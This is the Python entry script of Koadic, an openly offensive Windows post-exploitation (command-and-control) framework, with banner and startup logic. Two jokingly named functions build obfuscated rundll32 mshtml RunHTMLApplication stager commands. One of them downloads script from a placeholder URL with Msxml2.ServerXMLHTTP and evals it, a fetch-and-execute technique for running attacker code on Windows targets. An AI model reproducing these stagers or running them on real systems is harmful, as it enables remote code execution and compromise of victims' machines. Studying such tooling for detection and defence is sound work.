#!/usr/bin/env python3
# Copyright (c) 2016 - 2018 RiskSense, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use the software except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.

# Disclaimer:
# Usage of Koadic for attacking targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state,
# federal, and international laws. Developers assume no liability and are not
# responsible for any misuse or damage caused by this program.

__version_info__ = (0, "B") # Permanent Alpha
__version__ = "x".join(map(str, __version_info__))
__license__ = "Apache 2.0"
__credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-", "barballs"]

def createHolidayList():
    holidays = dict()
    holidays[datetime.date(datetime.date.today().year, 2, 14)] = 'data/valentine.txt'
    holidays[datetime.date(datetime.date.today().year, 3, 17)] = 'data/shamrock.txt'
    return holidays

def createWeekList():
    weekly = dict()
    weekly[1] = 'data/taco.txt'
    weekly[4] = 'data/pabst.txt'
    return weekly

def pay_no_attention():
    import random
    import string

    bignumber = 20

    command = "rundll32"
    command += " ~URL~"

    dotpath = []

    for i in range(0, 3):
        dotpath.append('..')

    for i in range(0, bignumber):
        dotpath.append('.')

    random.shuffle(dotpath)

    path = ""
    dotpathwithslashes = []
    for i in dotpath:
        dotpathwithslashes.append("\\" + i)

    path = ''.join(dotpathwithslashes)
    path += "\\"

    command += path + "mshtml"
    command += ''.join([random.choice([',',' ']) for i in range(0,random.randint(20,40))])
    command += ","
    command += " "
    command += "RunHTMLApplication"

    command = "rundll32.exe ~URL~\\..\\..\\..\\mshtml,RunHTMLApplication"

    with open('data/stager/js/rundll32/rundll32.cmd', 'w') as f:
        f.write(command+"\n")

def seriously_nothing_shady_here():
    import random
    import string

    bignumber = 20

    coin = [True,False]
    command = "rundll32"
    command += " javascript:\""

    dotpath = []

    for i in range(0, random.randint(1,3)):
        dotpath.append('..')

    for i in range(0, bignumber):
        dotpath.append('.')

    random.shuffle(dotpath)

    path = ""
    slashes = ["\\"]
    dotpathwithslashes = []

    for i in dotpath:
        dotpathwithslashes.append(random.choice(slashes) + i)

    if dotpathwithslashes[0] == '..' or dotpathwithslashes[0] == '.':
        tmp = dotpathwithslashes[0]
        dotpathwithslashes = dotpathwithslashes[1:]
        random.shuffle(dotpathwithslashes)
        dotpathwithslashes.insert(0, tmp)
    else:
        random.shuffle(dotpathwithslashes)

    path = ''.join(dotpathwithslashes)
    path += random.choice(slashes)

    command += path + "mshtml"
    command += ''.join([random.choice([',',' ']) for i in range(0,random.randint(20,40))])
    command += ","
    command += " "
    command += "RunHTMLApplication \";x=new%20ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"~URL~\",false);x.send();eval(x.responseText);window.close();"

    command = """rundll32.exe javascript:"\\..\\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","~URL~",false);x.send();eval(x.responseText);window.close();"""

    with open('data/stager/js/rundll32_js/rundll32_js.cmd', 'w') as f:
        f.write(command+"\n")

def find_center(banner):
    import re
    max_l = 0
    for l in banner.splitlines():
        reaesc = re.compile(r'\x1b[^m]*m')
        new_l = reaesc.sub('', l)
        if len(new_l) > max_l:
            max_l = len(new_l)
    return int(max_l/2)

def reposition_info(info, center):
    base_spaces = 1
    if center > 20:
        base_spaces = center-20
    return (info % (' '*base_spaces, ' '*(base_spaces+4), ' '*(base_spaces+11), ' '*(base_spaces+10), 's', ' '*(base_spaces+10), 'd', ' '*(base_spaces+10), 'd' ))

if __name__ == "__main__":
    import core.shell
    import argparse
    import datetime

    parser = argparse.ArgumentParser()
    parser.add_argument("--autorun", help="a file containing commands to autorun at startup")
    parser.add_argument("-o", action="store_true", help="it is tuesday my dudes")
    parser.add_argument("--restore", help="a koadic restore json file")
    args = parser.parse_args()
    autorun = open(args.autorun).read().split("\n") if args.autorun else []
    if args.restore:
        import json
        restore = json.loads(open(args.restore).read())
    else:
        restore = {}

    #events
    events = createHolidayList()
    weekly = createWeekList()

    if args.o:
        banner = open("data/taco.txt", "rb").read().decode("unicode_escape")
    elif datetime.date.today() in events:
        banner = open(events[datetime.date.today()], "rb").read().decode("unicode_escape")
    elif datetime.date.today().weekday() in weekly:
        banner = open(weekly[datetime.date.today().weekday()], "rb").read().decode("unicode_escape")
    else:
        banner = open("data/banner.txt", "rb").read().decode("unicode_escape")

    banner += reposition_info(open("data/banner_info.txt", "rb").read().decode("unicode_escape"), find_center(banner))

    # pay_no_attention()
    # seriously_nothing_shady_here()

    shell = core.shell.Shell(banner, __version__)
    shell.run(autorun, restore)